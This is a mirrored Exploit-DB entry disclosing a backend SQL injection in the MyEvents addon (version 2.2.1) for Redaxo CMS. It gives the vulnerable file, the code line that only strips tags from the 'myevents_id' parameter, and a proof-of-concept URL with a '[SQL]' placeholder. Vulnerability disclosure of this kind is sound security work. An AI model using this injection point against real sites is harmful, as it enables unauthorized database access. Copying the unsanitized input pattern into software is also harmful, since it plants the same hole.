exploit-db-mirror/exploits/php/webapps/44261.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
543 B
Text

# Exploit Title: Redaxo CMS Addon MyEvents SQL Injection [ Backend ]
# Date: 01.03.2018
# Exploit Author: h0n1gsp3cht
# Vendor Homepage: http://www.github.com/wende60/myevents
# Version: 2.2.1 (Last Version)
# Tested on: LinuxMint
# More: Login Required
# GET
##############
Vuln Code [+] redaxo/src/addons/myevents/pages/event_add.php
##############
$myevents_id = strip_tags(rex_request('myevents_id', 'string'));
###############
POC
###############
http://127.0.0.1/redaxo/index.php?page=myevents/event_add&myevents_id=[SQL]